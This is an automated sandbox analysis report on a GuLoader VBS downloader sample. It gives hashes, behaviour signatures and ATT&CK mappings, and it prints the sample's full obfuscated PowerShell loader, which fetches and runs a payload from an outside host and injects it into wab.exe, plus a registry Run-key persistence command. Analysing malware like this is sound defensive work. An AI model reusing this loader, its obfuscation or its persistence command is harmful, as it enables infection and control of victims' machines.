guloader | 101709ca246d0ef5a9dad2f4fcaadc6325f122563636e340ebe692f5c3c7f371

Analysis

max time kernel
1558s
max time network
1559s
platform
windows7_x64
resource
win7-20240215-en
resource tags

arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
submitted
25-04-2024 14:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

AWB20240425-GW036A.vbs
Size

15KB
MD5

851a938de8e948fdc84f7c247e868307
SHA1

20608ab0ed33379c6aa8c122d7abd6395c773919
SHA256

e03a97e8a866aaacc25682c3b75ec079e33a7f86bbb1e996696e91466de2a317
SHA512

0b7f4309c7e52ce7b341d754574a33f307ae92ed2134851049d87d005e6711f64aa42c343643db2fe4030a536506db6a436873de21ea45f9b3b53291e9ac7988
SSDEEP

384:4k+zpvxiGkmL8tdmUQOoAHCBMFgZvBGZKqWjRe3ie1t:4keMJc8tPh0eK5lSz

Score

10^/10

guloader downloader persistence

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 2800 powershell.exe

flow	pid	process
4	2800	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\tested = "%Dwindles% -w 1 $Forskningsbibliotekarens=(Get-ItemProperty -Path 'HKCU:\\actor\\').Nivan;%Dwindles% ($Forskningsbibliotekarens)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

Processes:

wab.exe

pid process

1992 wab.exe
1992 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2432 powershell.exe
1992 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2432 set thread context of 1992 2432 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1284 reg.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exepowershell.exe

pid process

2800 powershell.exe
2432 powershell.exe
2432 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

2432 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2800 powershell.exe
Token: SeDebugPrivilege 2432 powershell.exe

pid	process
1992	wab.exe
1992	wab.exe

pid	process
2432	powershell.exe
1992	wab.exe

description	pid	process	target process
PID 2432 set thread context of 1992	2432	powershell.exe	wab.exe

pid	process
1284	reg.exe

pid	process
2800	powershell.exe
2432	powershell.exe
2432	powershell.exe

pid	process
2432	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2800	powershell.exe
Token: SeDebugPrivilege	2432	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

WScript.exepowershell.exepowershell.exewab.execmd.exe

description	pid	process	target process
PID 2816 wrote to memory of 2800	2816	WScript.exe	powershell.exe
PID 2816 wrote to memory of 2800	2816	WScript.exe	powershell.exe
PID 2816 wrote to memory of 2800	2816	WScript.exe	powershell.exe
PID 2800 wrote to memory of 2592	2800	powershell.exe	cmd.exe
PID 2800 wrote to memory of 2592	2800	powershell.exe	cmd.exe
PID 2800 wrote to memory of 2592	2800	powershell.exe	cmd.exe
PID 2800 wrote to memory of 2432	2800	powershell.exe	powershell.exe
PID 2800 wrote to memory of 2432	2800	powershell.exe	powershell.exe
PID 2800 wrote to memory of 2432	2800	powershell.exe	powershell.exe
PID 2800 wrote to memory of 2432	2800	powershell.exe	powershell.exe
PID 2432 wrote to memory of 2316	2432	powershell.exe	cmd.exe
PID 2432 wrote to memory of 2316	2432	powershell.exe	cmd.exe
PID 2432 wrote to memory of 2316	2432	powershell.exe	cmd.exe
PID 2432 wrote to memory of 2316	2432	powershell.exe	cmd.exe
PID 2432 wrote to memory of 1992	2432	powershell.exe	wab.exe
PID 2432 wrote to memory of 1992	2432	powershell.exe	wab.exe
PID 2432 wrote to memory of 1992	2432	powershell.exe	wab.exe
PID 2432 wrote to memory of 1992	2432	powershell.exe	wab.exe
PID 2432 wrote to memory of 1992	2432	powershell.exe	wab.exe
PID 2432 wrote to memory of 1992	2432	powershell.exe	wab.exe
PID 1992 wrote to memory of 2168	1992	wab.exe	cmd.exe
PID 1992 wrote to memory of 2168	1992	wab.exe	cmd.exe
PID 1992 wrote to memory of 2168	1992	wab.exe	cmd.exe
PID 1992 wrote to memory of 2168	1992	wab.exe	cmd.exe
PID 2168 wrote to memory of 1284	2168	cmd.exe	reg.exe
PID 2168 wrote to memory of 1284	2168	cmd.exe	reg.exe
PID 2168 wrote to memory of 1284	2168	cmd.exe	reg.exe
PID 2168 wrote to memory of 1284	2168	cmd.exe	reg.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\AWB20240425-GW036A.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2816

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Forstder = 1;$Epigrammatised='Substrin';$Epigrammatised+='g';Function Induktioners($Pechans65){$Foujdary=$Pechans65.Length-$Forstder;For($Ekviperinger132=6; $Ekviperinger132 -lt $Foujdary; $Ekviperinger132+=(7)){$Laborbxr189+=$Pechans65.$Epigrammatised.Invoke($Ekviperinger132, $Forstder);}$Laborbxr189;}function Kreditsiden($Ergoterapeutiske){& ($Pangane75) ($Ergoterapeutiske);}$Chenillers=Induktioners 'UnretiM incaro No.aszReexpeiTrickslOpvoksl Hurt,aF agme/Sjleka5Navnel. ynoph0Sprogf unramm(SkortoWKl.nteiF.rbilnIllumidTet,amoAar.fewBrachysR,coin LettucNIndv,aTToer.e ,etspr1 Casel0Massem.comp,i0 Pol.p; To re Skik eW SutteikammennDe.ent6 Bribe4Staast;Guldhe ClarixS,urop6Outtro4Film n;Fretta TonsilrWittolvEfterg:Konfir1Redakt2Cognac1Afstra.Joinde0 Cellu)Rooved HavariGEuphoreStatsacCinemakDanutao rean/Kulmin2Extemp0mod,tn1lystig0Ineff.0 Intra1Invac.0 mongo1Cet.ne AbbotFUbefr i Termir SchizeRealitfre.oleoIdentixHassoc/Undsag1contai2limous1Baldri. Perso0Dessin ';$Bevilliget=Induktioners 'OmveksU Fr.desDan.ereRengjor.astro- O.hilAProramgUnt,uteEmb.zznBejaentDaarli ';$inddelings=Induktioners 'KlimathSparrotExtravtSpgesupLightn:Demine/Ufuldk/ Indhf8K.mmys7Blomst.neolit1.hygge2 Perez1Furcil. Depoh1Ladend0Af ikl5Lianes. Rive.1Sassan8Neence4Ubru,e/ acroP S rkblGyroc iejefaloProlettmonotor Skulpo tolernSpinal.BimboesRi,ingn RingdpA.rakn ';$Reclipsens=Induktioners 'Inte n>Fungo. ';$Pangane75=Induktioners 'U.shipiV ldtjeUdeblixmouldi ';$Unenergetic='Jrdis45';Kreditsiden (Induktioners ' CephaSNondiseFrerhutAccept-TillgsCVinge,oMothernRoperitVanddaeA.kohon Cucumt Rejse Vindue- PostePUnsigna SynsrtFrede hSam,rb Stam,aTGrineb:Unsubs\HeartyPAandlshGrott.aDokumelSensa.aWrasser SkoleoarbejdpSmarthoSlu.gedPantebiBlockhdNonconaScreeneKlipp..KonfigtLi.terxEnginot.emedi Fettle-middayVdat,sya ChefslCulletuSem fleSpndes Landst$ DahliUU.videnPaeanieGaasevn ArbejeCussesrStainfgThiocaeHoejadtDobbeliDovnercSkudsm; Un.es ');Kreditsiden (Induktioners 'Aqu.caiWantonf notec Inexpr(NonunctretlineTotalisLecanotAmides- Mck.npHenhreaBagsidtK,gemahLatt.r S.undnTTrohj.:Pulser\KoloniPMasc.lhL,renzaPeridilA.tiaraS rittr Eq icoMe.esapmle,esoCountedLaudabisamar,dAcroteaAr.ense Udvi ..erchlt .fterxLejligt rund)Talesp{Titelke TipbuxUkorreiBabaylt So.da}Humani;Interf ');$Unviolined = Induktioners ' Unp.oe PentacLithoehMopishoProwes ureter% Ch nda s perpLagerlpDriftsd Va uea,imenst Spacea Besti%Maxkar\ ma thS Amphit PoisaiKontoulMaysiniHolectsM ngestHoussmiBiolumsVrdighkVindmle Nona sDug al.CymlinSMorterh,rontae Redde B.stte&Dobbel& Preci Dagd,ieBronkocMaltenhUniveroGravre Bushw$Klangs ';Kreditsiden (Induktioners 'Speakh$ IndsngMirakllBic.looHusligbHendbeaLderetl Heter:HydroxWOperaniChemo tMed.arh Un.ase ProklrRent beRysterd TransnUdskr.e.ydromsPljejosS,ndik= orst( Mort.cskulpemUnknowdWorryi folkek/Asylsgc S att porses$Skins,U UndvinGodskrvDelfuni PayoroCupfullRemicli HjemmnTarmkaeint rmd Overm)Vsele ');Kreditsiden (Induktioners 'Fagstu$MngdengRe ninl BrisaoDidracbSk,ermaStenotlsans r:UdlgstDR,compaMer admcutlete raquebSun.helKaretea SnftmdIrksfee L ebgspipec.9gglesp4Sal ic= E per$Pil.emiSpeakenSammendLednindTandsteAntagolOmstbeiPortrtnconflugAfvbnes likf.l,thotsShrivepAnchusl.yggekiSupervtSi etr(Divini$SkeledRAgerdyeParliacVers,olStreckiLeve ipKeybutsTi,slreBazoo nSelvsksTranss) Lyopo ');$inddelings=$Dameblades94[0];Kreditsiden (Induktioners ' Muckr$ mirelg.resopl L,ereoSqui,eb Po seaUnmaillPeriku: TrichHO,ientaMisenul AfkrfvKundenfIcyafstSpringtOxy,yaeDelicarghoulie risernBackarsMouthy=IsocytNAarstieA lnafwSkyesd- He.veOTombakbUnderpjUncommeex rbscKonsultegoers vedlagSH ekylyLaanebsNavngitPurebleTu,binm uning. ,tomeNE.adiaeBik,getTredve.JyllanWOv.rpreFyresebSandmeCD,lnoelAn epei OffseeA.teron ManuatMalisk ');Kreditsiden (Induktioners 'Chowde$HjsindHRap,elaBibelsl Levievf,rstefstedsat Prok.tEtudeneTjenesr.oranseAktieanSva essDodded. DifteH .ecereCaus,laDipperdNece.se,orgelr S.gnis Lorch[Bladko$FletkoBOutvoieQu.ntivMelainiFeltt.l RhabdlRespeciDimissg LateneLethartDds.eg]Al.let=Tumata$IndholCUg ianhSchoolebeckyfnSign.tiFerierl multilCalycleHoubarrP.aksisRadius ');$returbilletter=Induktioners 'LoadimHLugninaCadmiel EjendvSkjortf,tandatElutortDetacheGodhearSkagenePe thonSkohorsMisman. refecDPesti o,mtsskwFa,amonGu fdrlAlde.soSundowaPasiladMoraliF Roe mikram,olGordyae,ugabo(Heirsf$R shvei CustonHyt.efdCong ldCamorreAchanglKontroiBabcocn Wifelg VarnisMaleri,Radonm$O.iginpComp lr KirgiePennatvTun,selPreceslL.steniOvertrnStudehgAroideeDaleren .akul)Settle ';$returbilletter=$Witheredness[1]+$returbilletter;$prevllingen=$Witheredness[0];Kreditsiden (Induktioners 'Homosp$ VolpagIl,kuglDand soRotatobPutt,haHidserl Skade: mbygP Recipa Dollir RevanssygeekoAm.sranPick,esIdoleriIst mtaUdvide=Vassa.(Flik,lTfo.tykeflykaps ReevotMiddle-Tor,isPAdherea OctectPneu ahosteo. Me de$Submarp L.gerrAbococe FugacvR.jseblSolurelAfhndeiLejerenLidelsgPro.ene Imerinhiccou)Rektio ');while (!$Parsonsia) {Kreditsiden (Induktioners 'Repsbi$ D,enggQuintelPensiooKaravab KogekaEglandl Jurat:HvilenEdoublelInappoeFridilcDishertTou.hhrBilligoBodilidOu.mariHyper sAnsti,pEvilspe Yelvar .rnsesLau ifiUnsimuvAusc leSacram=Puddle$Rrfle.tIsometromstiluEstrageDkslas ') ;Kreditsiden $returbilletter;Kreditsiden (Induktioners 'VegeteS CuyaitResyncacaque,rEmotiotSeromu-TartarSSnapwolSemipeeMopboaeInter p Allee Totala4Monost ');Kreditsiden (Induktioners 'Synskr$RamequgParasilSti.stoRunch.bHymenaaSubtralPittud:DaginsPVariegaDesperrOparbes.apetbo ndrmmnSisalesSuperiientotiaI cola=Serag,(eftersT Borize Bu,imssmrtyvtSt vef-T.nistPIngeniaUltrattC.nonchViljes korsar$Une.ympAbonnerLizz.ieNationv skivelTricollreinhoiStrackn arvengRea,lne Nondendis er)P,ctur ') ;Kreditsiden (Induktioners 'Blindt$CartelgHvil.llFormuloUdomo.bSpatioaDetaillU.diss:.entilRWellhoe D ivgi alesbf adjutiTrawlnkSkibbraSemi.btAi retiTyfus oDuettenGuldfu=Gradsf$DragkigK istel DecomoBeslaabTransfaMuliebl Apop : Tam,lFLigat,aMak.otbHolozor ,etanibro ink onomisOvervam Catalr ,irurkRetslgeGro,gytoutcavs .igna+Ophtha+tandem%Pseudo$ vi.dmDPlaidea Endnom Persoe FootgbBrutt lAbusaba L,erld robae U.parsPyrami9encyrt4.ontou.Mili ucTorpedoMosk suOverlinHarmo.tkaktus ') ;$inddelings=$Dameblades94[$Reifikation];}Kreditsiden (Induktioners 'Skylle$Altruig ,olaplSkaaneoRullesbUd seuaMokke,lOpbrin:DiskofFSherifeTuppenrSortlisStdesekBltedkvbasta.aReobtarsocialeArvemat VandueFilletrJournamUnusagi.annetnPartilaYouth l BadevsRevers Molehe=Afglat f,avalGmot,rie Si,ketjulebu- MonovCPrecomoVilopsn DanertAntivee.acrotnUnarmetPaamin Unmedi$SporidpRec rkrIndoeueAfrettvCatechlSpro.nl fa,ebiGorto,n ParatgAgramee UneasnAntice ');Kreditsiden (Induktioners 'Forsrg$ D,rmagPseud,lEditoroBis.arb Wh,nia.ulfonlPashal:NummerFIndprel ReappaTr.ndscNat,evkT.yrsieWolfrarBordel Fonern=Underf Valuta[ReintrS SamgiyLegitisFagpolt ychoe FremsmCitere.ConsumCArtsfooUndergnUdkra,vTypegoePrivatr l,strt Pr.fe]Tha.ll:Tertia:A.kilsFQuasi,rOversto nocksmAn lopBDeglacaOver,psIndustepiuink6God,kr4SlappeS ScanptOpspo.rstorkoiKari,an IntragLogere(ballst$ olkekFSkuespe LysflrAa devs Grif,kElderlvAfbilla Blaa rCirkuseca chetG sjfteVernorrSkovb.mSp jlgi oszanSubrutaCocae.l Amp rs dsvve)Unmast ');Kreditsiden (Induktioners ' Ubast$K.ordig Kerubl AutodosammenbHoffe,a iacholAxi te:An.ropU Trr.rn U.pnshRetsinu Farvem Dr psiB.ndesdE.kort Leksik= Mylo, S,nes[PalmetS StendyEmploysBagsdetOverstebagatemMedar,.monterT Unceretrv.grxFon.antIndf n. AutobEinvalonBumpkicPericloPromatdHjlpeoiEr,vernVold lgtetrad]Deco.l:Ser zy: DesigATrykstSApplauCHeroisIFjerteIvarmel.Pyra,rGDatafieVrdifotMachisSPapfabtUberetrFirma,isc,locn Strafg Ryatp( small$BindslFAnastolRacerna FiretcBo.nerkBager.eVilifirLedn n).ameks ');Kreditsiden (Induktioners 'Papi k$Circu,gNiccoplK ightoDomorgbChosetaBarsell Feliz: pileFGerocoi.oodcrnMumpsifSciagroCi,cumoLillest Ringfspre,xh=Intuit$ T ffeUAcri onRrbladh KochbuTumbesmSkibshiBambusdBru kb.CosiedsC.nesku Fu.rubPyr.lisAthlettElaphirInund iSto.svnPhosgegUddata( Rat o3 Adres4Plantr0Afsnit9Unperm5Medusa5Drafts,,antho2Suspen9 fagot4Afsoeg1Elaeo 1Brainc)Whaleh ');Kreditsiden $Finfoots;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2800

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stilistiskes.She && echo $"
3⤵
PID:2592

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Forstder = 1;$Epigrammatised='Substrin';$Epigrammatised+='g';Function Induktioners($Pechans65){$Foujdary=$Pechans65.Length-$Forstder;For($Ekviperinger132=6; $Ekviperinger132 -lt $Foujdary; $Ekviperinger132+=(7)){$Laborbxr189+=$Pechans65.$Epigrammatised.Invoke($Ekviperinger132, $Forstder);}$Laborbxr189;}function Kreditsiden($Ergoterapeutiske){& ($Pangane75) ($Ergoterapeutiske);}$Chenillers=Induktioners 'UnretiM incaro No.aszReexpeiTrickslOpvoksl Hurt,aF agme/Sjleka5Navnel. ynoph0Sprogf unramm(SkortoWKl.nteiF.rbilnIllumidTet,amoAar.fewBrachysR,coin LettucNIndv,aTToer.e ,etspr1 Casel0Massem.comp,i0 Pol.p; To re Skik eW SutteikammennDe.ent6 Bribe4Staast;Guldhe ClarixS,urop6Outtro4Film n;Fretta TonsilrWittolvEfterg:Konfir1Redakt2Cognac1Afstra.Joinde0 Cellu)Rooved HavariGEuphoreStatsacCinemakDanutao rean/Kulmin2Extemp0mod,tn1lystig0Ineff.0 Intra1Invac.0 mongo1Cet.ne AbbotFUbefr i Termir SchizeRealitfre.oleoIdentixHassoc/Undsag1contai2limous1Baldri. Perso0Dessin ';$Bevilliget=Induktioners 'OmveksU Fr.desDan.ereRengjor.astro- O.hilAProramgUnt,uteEmb.zznBejaentDaarli ';$inddelings=Induktioners 'KlimathSparrotExtravtSpgesupLightn:Demine/Ufuldk/ Indhf8K.mmys7Blomst.neolit1.hygge2 Perez1Furcil. Depoh1Ladend0Af ikl5Lianes. Rive.1Sassan8Neence4Ubru,e/ acroP S rkblGyroc iejefaloProlettmonotor Skulpo tolernSpinal.BimboesRi,ingn RingdpA.rakn ';$Reclipsens=Induktioners 'Inte n>Fungo. ';$Pangane75=Induktioners 'U.shipiV ldtjeUdeblixmouldi ';$Unenergetic='Jrdis45';Kreditsiden (Induktioners ' CephaSNondiseFrerhutAccept-TillgsCVinge,oMothernRoperitVanddaeA.kohon Cucumt Rejse Vindue- PostePUnsigna SynsrtFrede hSam,rb Stam,aTGrineb:Unsubs\HeartyPAandlshGrott.aDokumelSensa.aWrasser SkoleoarbejdpSmarthoSlu.gedPantebiBlockhdNonconaScreeneKlipp..KonfigtLi.terxEnginot.emedi Fettle-middayVdat,sya ChefslCulletuSem fleSpndes Landst$ DahliUU.videnPaeanieGaasevn ArbejeCussesrStainfgThiocaeHoejadtDobbeliDovnercSkudsm; Un.es ');Kreditsiden (Induktioners 'Aqu.caiWantonf notec Inexpr(NonunctretlineTotalisLecanotAmides- Mck.npHenhreaBagsidtK,gemahLatt.r S.undnTTrohj.:Pulser\KoloniPMasc.lhL,renzaPeridilA.tiaraS rittr Eq icoMe.esapmle,esoCountedLaudabisamar,dAcroteaAr.ense Udvi ..erchlt .fterxLejligt rund)Talesp{Titelke TipbuxUkorreiBabaylt So.da}Humani;Interf ');$Unviolined = Induktioners ' Unp.oe PentacLithoehMopishoProwes ureter% Ch nda s perpLagerlpDriftsd Va uea,imenst Spacea Besti%Maxkar\ ma thS Amphit PoisaiKontoulMaysiniHolectsM ngestHoussmiBiolumsVrdighkVindmle Nona sDug al.CymlinSMorterh,rontae Redde B.stte&Dobbel& Preci Dagd,ieBronkocMaltenhUniveroGravre Bushw$Klangs ';Kreditsiden (Induktioners 'Speakh$ IndsngMirakllBic.looHusligbHendbeaLderetl Heter:HydroxWOperaniChemo tMed.arh Un.ase ProklrRent beRysterd TransnUdskr.e.ydromsPljejosS,ndik= orst( Mort.cskulpemUnknowdWorryi folkek/Asylsgc S att porses$Skins,U UndvinGodskrvDelfuni PayoroCupfullRemicli HjemmnTarmkaeint rmd Overm)Vsele ');Kreditsiden (Induktioners 'Fagstu$MngdengRe ninl BrisaoDidracbSk,ermaStenotlsans r:UdlgstDR,compaMer admcutlete raquebSun.helKaretea SnftmdIrksfee L ebgspipec.9gglesp4Sal ic= E per$Pil.emiSpeakenSammendLednindTandsteAntagolOmstbeiPortrtnconflugAfvbnes likf.l,thotsShrivepAnchusl.yggekiSupervtSi etr(Divini$SkeledRAgerdyeParliacVers,olStreckiLeve ipKeybutsTi,slreBazoo nSelvsksTranss) Lyopo ');$inddelings=$Dameblades94[0];Kreditsiden (Induktioners ' Muckr$ mirelg.resopl L,ereoSqui,eb Po seaUnmaillPeriku: TrichHO,ientaMisenul AfkrfvKundenfIcyafstSpringtOxy,yaeDelicarghoulie risernBackarsMouthy=IsocytNAarstieA lnafwSkyesd- He.veOTombakbUnderpjUncommeex rbscKonsultegoers vedlagSH ekylyLaanebsNavngitPurebleTu,binm uning. ,tomeNE.adiaeBik,getTredve.JyllanWOv.rpreFyresebSandmeCD,lnoelAn epei OffseeA.teron ManuatMalisk ');Kreditsiden (Induktioners 'Chowde$HjsindHRap,elaBibelsl Levievf,rstefstedsat Prok.tEtudeneTjenesr.oranseAktieanSva essDodded. DifteH .ecereCaus,laDipperdNece.se,orgelr S.gnis Lorch[Bladko$FletkoBOutvoieQu.ntivMelainiFeltt.l RhabdlRespeciDimissg LateneLethartDds.eg]Al.let=Tumata$IndholCUg ianhSchoolebeckyfnSign.tiFerierl multilCalycleHoubarrP.aksisRadius ');$returbilletter=Induktioners 'LoadimHLugninaCadmiel EjendvSkjortf,tandatElutortDetacheGodhearSkagenePe thonSkohorsMisman. refecDPesti o,mtsskwFa,amonGu fdrlAlde.soSundowaPasiladMoraliF Roe mikram,olGordyae,ugabo(Heirsf$R shvei CustonHyt.efdCong ldCamorreAchanglKontroiBabcocn Wifelg VarnisMaleri,Radonm$O.iginpComp lr KirgiePennatvTun,selPreceslL.steniOvertrnStudehgAroideeDaleren .akul)Settle ';$returbilletter=$Witheredness[1]+$returbilletter;$prevllingen=$Witheredness[0];Kreditsiden (Induktioners 'Homosp$ VolpagIl,kuglDand soRotatobPutt,haHidserl Skade: mbygP Recipa Dollir RevanssygeekoAm.sranPick,esIdoleriIst mtaUdvide=Vassa.(Flik,lTfo.tykeflykaps ReevotMiddle-Tor,isPAdherea OctectPneu ahosteo. Me de$Submarp L.gerrAbococe FugacvR.jseblSolurelAfhndeiLejerenLidelsgPro.ene Imerinhiccou)Rektio ');while (!$Parsonsia) {Kreditsiden (Induktioners 'Repsbi$ D,enggQuintelPensiooKaravab KogekaEglandl Jurat:HvilenEdoublelInappoeFridilcDishertTou.hhrBilligoBodilidOu.mariHyper sAnsti,pEvilspe Yelvar .rnsesLau ifiUnsimuvAusc leSacram=Puddle$Rrfle.tIsometromstiluEstrageDkslas ') ;Kreditsiden $returbilletter;Kreditsiden (Induktioners 'VegeteS CuyaitResyncacaque,rEmotiotSeromu-TartarSSnapwolSemipeeMopboaeInter p Allee Totala4Monost ');Kreditsiden (Induktioners 'Synskr$RamequgParasilSti.stoRunch.bHymenaaSubtralPittud:DaginsPVariegaDesperrOparbes.apetbo ndrmmnSisalesSuperiientotiaI cola=Serag,(eftersT Borize Bu,imssmrtyvtSt vef-T.nistPIngeniaUltrattC.nonchViljes korsar$Une.ympAbonnerLizz.ieNationv skivelTricollreinhoiStrackn arvengRea,lne Nondendis er)P,ctur ') ;Kreditsiden (Induktioners 'Blindt$CartelgHvil.llFormuloUdomo.bSpatioaDetaillU.diss:.entilRWellhoe D ivgi alesbf adjutiTrawlnkSkibbraSemi.btAi retiTyfus oDuettenGuldfu=Gradsf$DragkigK istel DecomoBeslaabTransfaMuliebl Apop : Tam,lFLigat,aMak.otbHolozor ,etanibro ink onomisOvervam Catalr ,irurkRetslgeGro,gytoutcavs .igna+Ophtha+tandem%Pseudo$ vi.dmDPlaidea Endnom Persoe FootgbBrutt lAbusaba L,erld robae U.parsPyrami9encyrt4.ontou.Mili ucTorpedoMosk suOverlinHarmo.tkaktus ') ;$inddelings=$Dameblades94[$Reifikation];}Kreditsiden (Induktioners 'Skylle$Altruig ,olaplSkaaneoRullesbUd seuaMokke,lOpbrin:DiskofFSherifeTuppenrSortlisStdesekBltedkvbasta.aReobtarsocialeArvemat VandueFilletrJournamUnusagi.annetnPartilaYouth l BadevsRevers Molehe=Afglat f,avalGmot,rie Si,ketjulebu- MonovCPrecomoVilopsn DanertAntivee.acrotnUnarmetPaamin Unmedi$SporidpRec rkrIndoeueAfrettvCatechlSpro.nl fa,ebiGorto,n ParatgAgramee UneasnAntice ');Kreditsiden (Induktioners 'Forsrg$ D,rmagPseud,lEditoroBis.arb Wh,nia.ulfonlPashal:NummerFIndprel ReappaTr.ndscNat,evkT.yrsieWolfrarBordel Fonern=Underf Valuta[ReintrS SamgiyLegitisFagpolt ychoe FremsmCitere.ConsumCArtsfooUndergnUdkra,vTypegoePrivatr l,strt Pr.fe]Tha.ll:Tertia:A.kilsFQuasi,rOversto nocksmAn lopBDeglacaOver,psIndustepiuink6God,kr4SlappeS ScanptOpspo.rstorkoiKari,an IntragLogere(ballst$ olkekFSkuespe LysflrAa devs Grif,kElderlvAfbilla Blaa rCirkuseca chetG sjfteVernorrSkovb.mSp jlgi oszanSubrutaCocae.l Amp rs dsvve)Unmast ');Kreditsiden (Induktioners ' Ubast$K.ordig Kerubl AutodosammenbHoffe,a iacholAxi te:An.ropU Trr.rn U.pnshRetsinu Farvem Dr psiB.ndesdE.kort Leksik= Mylo, S,nes[PalmetS StendyEmploysBagsdetOverstebagatemMedar,.monterT Unceretrv.grxFon.antIndf n. AutobEinvalonBumpkicPericloPromatdHjlpeoiEr,vernVold lgtetrad]Deco.l:Ser zy: DesigATrykstSApplauCHeroisIFjerteIvarmel.Pyra,rGDatafieVrdifotMachisSPapfabtUberetrFirma,isc,locn Strafg Ryatp( small$BindslFAnastolRacerna FiretcBo.nerkBager.eVilifirLedn n).ameks ');Kreditsiden (Induktioners 'Papi k$Circu,gNiccoplK ightoDomorgbChosetaBarsell Feliz: pileFGerocoi.oodcrnMumpsifSciagroCi,cumoLillest Ringfspre,xh=Intuit$ T ffeUAcri onRrbladh KochbuTumbesmSkibshiBambusdBru kb.CosiedsC.nesku Fu.rubPyr.lisAthlettElaphirInund iSto.svnPhosgegUddata( Rat o3 Adres4Plantr0Afsnit9Unperm5Medusa5Drafts,,antho2Suspen9 fagot4Afsoeg1Elaeo 1Brainc)Whaleh ');Kreditsiden $Finfoots;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2432

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stilistiskes.She && echo $"
4⤵
PID:2316

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1992

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tested" /t REG_EXPAND_SZ /d "%Dwindles% -w 1 $Forskningsbibliotekarens=(Get-ItemProperty -Path 'HKCU:\actor\').Nivan;%Dwindles% ($Forskningsbibliotekarens)"
5⤵
- Suspicious use of WriteProcessMemory
PID:2168

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tested" /t REG_EXPAND_SZ /d "%Dwindles% -w 1 $Forskningsbibliotekarens=(Get-ItemProperty -Path 'HKCU:\actor\').Nivan;%Dwindles% ($Forskningsbibliotekarens)"
6⤵
- Adds Run key to start application
- Modifies registry key
PID:1284

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IDAUDJM1JT7818KJQ4S3.temp
Filesize
7KB

MD5
4cc2c5e400c7e4a4a2065c8872f5e492

SHA1
10ab3c879290beb6274ea728a2930b13967283d4

SHA256
1d1bdfa9113f739233c601a0e9cc1c3f77fae951434252b58690a40d65d0bbe4

SHA512
4615059b062b4fa6d53d6b7197b10dfdf439413166a19c7bd3945bfa66508ca9d30760165673892871b8bb605e4e6e2f9dda2a68b6a3cdcc0d98ef924ae88e73

Download Submit
C:\Users\Admin\AppData\Roaming\Stilistiskes.She
Filesize
482KB

MD5
4f20e4840a32dc400990d68b8904f369

SHA1
0219b41ec76336cb01246d2d8ce0926245f3051a

SHA256
5ce055ec4f39568ec128be6145590716d7edde9096d813342ea585e50cfe0c13

SHA512
1b441dff972e7333f55cdbf39875c38b998855b74f80c5ec355198906f949afa6e4761ae74d22bb122a0bfa268e38435e6ac48234c7005fb5ac83719d273c49f

Download Submit
memory/1992-41-0x00000000772B0000-0x0000000077386000-memory.dmp

Filesize
856KB

Download
memory/1992-38-0x00000000015C0000-0x000000000358D000-memory.dmp

Filesize
31.8MB

Download
memory/1992-37-0x00000000772B0000-0x0000000077386000-memory.dmp

Filesize
856KB

Download
memory/1992-36-0x00000000772E6000-0x00000000772E7000-memory.dmp

Filesize
4KB

Download
memory/1992-35-0x00000000770C0000-0x0000000077269000-memory.dmp

Filesize
1.7MB

